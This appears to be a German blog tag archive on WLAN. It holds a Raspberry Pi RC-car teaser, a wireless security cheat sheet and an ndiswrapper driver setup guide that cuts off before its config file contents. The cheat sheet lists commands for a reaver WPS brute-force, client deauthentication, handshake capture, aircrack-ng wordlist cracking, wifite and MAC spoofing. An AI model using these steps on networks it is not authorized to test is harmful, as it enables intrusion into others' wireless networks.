Schlagwort-Archive: WLAN

RC-Car mit dem Smartphone steuern

Wir tauschen die herkömmliche Fernbedingung eines ferngesteuerten Autos durch einen Raspberry Pi und ein Android Smartphone aus.
Auf dem Auto wird der Raspberry befestigt. Mit ein paar Kabeln, werden die Servos bzw. Fahrtenreglern an denGPIOs des Raspberry angeschlossen. Über WLAN verbinden wir ein Handy mit den Raspberry und benutzten dies somit als Fernsteuerung. Weiterlesen

WLAN-Sicherheit

WLAN-Netze überwachen:

  1. iwconfig
  2. airmon-ng start wlan0
  3. airodump mon0
  4. Strg-c zum Beenden

Router mit WPS-Fehler testen:
reaver -i mon0 -b BSSID -vv

andere Router testen:

  1. airodump-ng -w caturefile-with-packages --bssid BSSID -c CHANNEL mon0
  2. neues terminal
    aireplay-ng --deauth 1 -a MAC-Router -c MAC-Client mon0
  3. neues terminal
    aircrack-ng caturefile-with-packages-01.cap -w ./wordlist.lst
  4. cd /usr/share/wordlistsgzip -d rockyou.txt.gz

Oder mit Airoscript testen:
airoscript: http://code.google.com/p/airoscript/downloads/detail?name=airoscript-ng_1.1.tgz&can=2&q=

WPA mit wifite prüfen:

  1. wifite starten
  2. Wenn genügend Netzwerke gefunden wurden, mit Strg-C abbrechen und das zu scannende Netzwerk auswählen.

MAC Adresse ändern:

  1. ifconfig wlan0 down
  2. macchanger wlan0 mac=A0:B4:FF:A1:CC:A1
  3. ifconfig wlan0 up

 

Diese Programme befinden sich auf Kali-Linux

ndiswrapper

Mit dem ndiswrapper lassen sich z.B. nicht unterstützte Netzwerk(Wlan)-Karten mittels Windows-Treiber einbinden.

Anleitung:

  1. ndiswrapper installieren
  2. Windows-Treiber installieren: ndiswrapper -i w70n51.inf (inf-Datei des Treibers, von der Original-CD!)
  3. modprobe ndiswrapper lädt den Treiber
  4. mit ndiswrapper -cat /proc/meminfol und ndiswrapper -v testen
  5. dmesg gibt die Kernel-Meldungen aus
  6. mit ndiswrapper -m wird der Treiber immer beim booten geladen
  7. Konfiguration:
    • iwconfig wlan0 mode managed
    • iwconfig wlan0 key restricted s:12345
    • iwconfig wlan0 essid "Netzwerkname"
    • ifconfig wlan0 up
    • dhclient
  8. WPA-Verschlüsselung
    • Schlüssel erzeugen
      wpa_passphrase xxxnonamexxx 1234567890123456
      xxxnonamexxx ist der Name meines Funknetzwerks und 123456…. der WPA-Schlüssel, den mir der Router ausgibtAls Ergebnis erhalten wir:

      Für uns ist der psk-Wert der gewünschte Wert, den wir gleich im Anschluss weiter verarbeiten.
    • wpa_supplicant
      im Verzeichnis /etc/wpa_supplicant/ wird die Datei wpa_supplicant.conf angelegt und folgender Inhalt eingefügt:
    • interfaces
      Im Verzeichnis /etc/network/ die Datei interfaces wie folgt anpassen (kompletter Inhalt):